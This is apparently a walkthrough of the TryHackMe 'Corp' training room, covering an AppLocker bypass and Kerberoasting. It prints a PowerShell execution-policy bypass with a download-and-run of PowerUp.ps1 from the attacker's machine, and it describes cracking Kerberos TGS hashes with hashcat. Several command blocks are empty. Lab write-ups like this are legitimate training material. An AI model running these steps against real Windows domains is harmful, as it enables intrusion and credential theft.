Corp
Room Link: https://tryhackme.com/room/corp
Bypassing Applocker
Load PowerUp.ps1 into memory.
Kali
wget https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1
python2 -m SimpleHTTPServer 81Add the following line at the bottom to PowerUp.ps1 so it Invokes all checks automatically once downloaded
PowerUp.ps1
Invoke-AllChecksVictim(powershell)
powershell -ep bypass
iex​(New-Object Net.WebClient).DownloadString('http://$KALI:81/PowerUp.ps1') 

Kali

Kali

Kerberoasting
Run the below command from the Administrator account we just got access to.
Victim(powershell)

Kali
Add the following line at the bottom to Invoke-Kerberoast.ps1 so it runs automatically once downloaded
Victim(powershell)

Run this to get rid of all the spaces.
Kali
Lets use hashcat to bruteforce this password. The type of hash we're cracking is Kerberos 5 TGS-REP etype 23 and the hashcat code for this is 13100.
Kali

Kali
Last updated